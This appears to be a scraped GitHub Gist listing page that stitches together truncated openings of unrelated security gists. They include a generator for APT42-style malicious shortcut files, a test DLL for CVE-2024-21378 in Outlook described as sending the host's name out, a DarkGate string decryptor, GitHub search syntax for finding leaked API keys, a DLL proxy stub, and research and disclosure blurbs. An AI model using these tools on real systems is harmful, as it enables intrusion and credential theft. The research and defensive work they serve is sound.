Ryota Sakai famasoon

@HackingLZ
HackingLZ / nicecurl.py
Created May 2, 2024 13:43
NICECURL Lnk Gen
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
import argparse
import random
import win32com.client
def insert_digit(word, digit):
    pos = random.randint(1, len(word) - 1)
    return word[:pos] + digit + word[pos:]
def generate_command(url, file_path):
@EvanMcBroom
EvanMcBroom / lsa-whisperer.md
Last active April 27, 2024 19:33
LSA Whisperer

LSA Whisperer

Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing! Crossposted on the SpecterOps Blog.

What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.

Special thanks are needed to Elad, Lee, Will, Daniel, and Kai. Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool. Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent

@Homer28
Homer28 / test_dll.c
Last active April 21, 2024 01:53
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@DerekSelander
DerekSelander / objc_description.m
Last active April 22, 2024 19:48
Dumps Objective-C class/instance info at runtime
//
// MIT License
//
// Copyright (c) 2024 Derek Selander
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
@X-Junior
X-Junior / DarkGate_Static_String_Decryption.py
Created August 3, 2023 13:42
DarkGate Static String Decryption
import sys , pefile , validators , re , base64
'''
Author: Mohamed Ashraf (@X__Junior)
Usage:
python3 darkgate.py path_to_sample
'''
def is_ascii(s):
    return all(ord(c) < 128 or ord(c) == 0 for c in s)
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",
Next Stage Download Domains:

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
// generated with sharpdllproxy.
@wireghoul
wireghoul / Printerlogic-disclosure.md
Last active May 27, 2023 23:24
Printerlogic-disclosure

PrinterLogic SaaS, multiple vulnerabilities

PrinterLogic's Enterprise Print Management software allows IT professionals to simplify printer driver management and empower end users. -- https://www.printerlogic.com/

Background

The following findings were identified by performing both dynamic testing of the PrinterLogic SaaS platform and code analysis of the source code contained in the virtual appliance available for download from the PrinterLogic website (Build 1.0.757: July 29th, 2022).